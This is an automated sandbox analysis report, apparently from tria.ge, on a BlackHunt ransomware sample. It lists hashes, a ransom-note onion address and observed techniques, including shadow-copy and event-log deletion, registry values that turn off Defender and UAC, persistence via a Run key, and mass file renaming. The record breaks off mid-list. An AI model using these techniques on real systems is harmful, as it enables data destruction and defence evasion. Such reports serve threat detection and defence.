Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
131s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:57
Static task
static1
Behavioral task
behavioral1
Sample
cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe
Resource
win10v2004-20231222-en
General
-
Target
cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe
-
Size
707KB
-
MD5
e38a2e6d7f1299ed0ec3877772551244
-
SHA1
23625745a4f062c96bfbedbe952d9b76e9422f78
-
SHA256
cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807
-
SHA512
15baf39d5b36c4cc295450795304998dba60beeafb5c8c06efe9225a5fbedf185b6a4cbd0a240d03a81713ad5f9908f828ec2c9ac157c30fa85addad427c12e9
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1z8Lvnh:6uaTmkZJ+naie5OTamgEoKxLWSbh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 7476 fsutil.exe 10048 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 10944 wevtutil.exe 8740 wevtutil.exe 8720 wevtutil.exe 10580 wevtutil.exe 308 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 10744 bcdedit.exe 7544 bcdedit.exe 10468 bcdedit.exe 9744 bcdedit.exe -
Renames multiple (3362) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 10316 wbadmin.exe 10520 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\R: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\A: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\H: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\O: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\Z: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\I: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\N: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\T: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\B: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\W: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\E: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\U: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\L: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\S: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\V: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\Q: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\Y: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\K: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\X: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\M: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\P: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened (read-only) \??\G: cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\ui-strings.js cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\eu-es\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\fake_logo.png cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\ui-strings.js cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\lcms.md cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_nothumbnail_34.svg cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\ui-strings.js cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\welcome-2x.png cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ja-jp\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sl-si\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\PlayStore_icon.svg cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pl-pl\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jni.h cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\VideoLAN\VLC\locale\be\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ar-ae\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner.gif cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\he-il\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\he-il\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\7-Zip\Lang\ka.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jawt.h cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\ui-strings.js cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nl-nl\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files\7-Zip\Lang\kab.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-sl\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sk-sk\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\core\dev\libs\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\remove.svg cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\ui-strings.js cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\ui-strings.js cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\ui-strings.js cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ar-ae\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\#BlackHunt_Private.key cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\#BlackHunt_ReadMe.txt cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\en_get.svg cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files\VideoLAN\VLC\locale\da\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\ui-strings.js cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\ui-strings.js cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ja-jp\#BlackHunt_ReadMe.hta cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 11008 10548 WerFault.exe 296 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7376 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7560 vssadmin.exe 8344 vssadmin.exe 7412 vssadmin.exe 7536 vssadmin.exe 7552 vssadmin.exe 11244 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 9388 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 12360 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Token: SeRestorePrivilege 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Token: SeBackupPrivilege 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Token: SeTakeOwnershipPrivilege 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Token: SeAuditPrivilege 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Token: SeSecurityPrivilege 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Token: SeIncBasePriorityPrivilege 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe Token: SeBackupPrivilege 10404 vssvc.exe Token: SeRestorePrivilege 10404 vssvc.exe Token: SeAuditPrivilege 10404 vssvc.exe Token: SeBackupPrivilege 9152 wbengine.exe Token: SeRestorePrivilege 9152 wbengine.exe Token: SeSecurityPrivilege 9152 wbengine.exe Token: SeSecurityPrivilege 308 wevtutil.exe Token: SeBackupPrivilege 308 wevtutil.exe Token: SeSecurityPrivilege 10944 wevtutil.exe Token: SeBackupPrivilege 10944 wevtutil.exe Token: SeSecurityPrivilege 8720 wevtutil.exe Token: SeBackupPrivilege 8720 wevtutil.exe Token: SeSecurityPrivilege 8740 wevtutil.exe Token: SeBackupPrivilege 8740 wevtutil.exe Token: SeSecurityPrivilege 10580 wevtutil.exe Token: SeBackupPrivilege 10580 wevtutil.exe Token: SeDebugPrivilege 9388 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4760 wrote to memory of 3832 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 92 PID 4760 wrote to memory of 3832 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 92 PID 4760 wrote to memory of 2308 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 93 PID 4760 wrote to memory of 2308 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 93 PID 4760 wrote to memory of 2436 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 96 PID 4760 wrote to memory of 2436 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 96 PID 4760 wrote to memory of 2728 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 100 PID 4760 wrote to memory of 2728 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 100 PID 4760 wrote to memory of 4356 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 98 PID 4760 wrote to memory of 4356 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 98 PID 4760 wrote to memory of 3724 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 124 PID 4760 wrote to memory of 3724 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 124 PID 4760 wrote to memory of 3076 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 102 PID 4760 wrote to memory of 3076 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 102 PID 4760 wrote to memory of 4836 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 101 PID 4760 wrote to memory of 4836 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 101 PID 4760 wrote to memory of 1064 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 123 PID 4760 wrote to memory of 1064 4760 cf475a3e3322b0b8383b748f30bf2e8b2bf01da9efcda81d782c90b5ecd4e807.exe 123 PID 4760 wrote to memory of 